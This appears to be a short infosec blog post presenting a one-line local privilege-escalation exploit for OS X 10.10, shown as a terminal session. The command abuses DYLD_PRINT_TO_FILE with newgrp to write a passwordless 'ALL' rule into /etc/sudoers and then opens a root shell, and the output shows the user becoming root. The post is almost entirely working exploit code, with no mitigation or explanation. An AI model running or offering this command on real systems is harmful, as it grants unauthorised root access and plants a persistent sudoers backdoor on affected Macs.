OSX 10.10 one line exploit

[email protected]:~/Desktop$ whoami
bbk

[email protected]:~/Desktop$ echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

[email protected]:~/Desktop$ whoami
root
BBK

BBK

Infosec analyst, lover of passwords, and owner of a giant goofy puppy.

Read More
OSX 10.10 one line exploit
Share this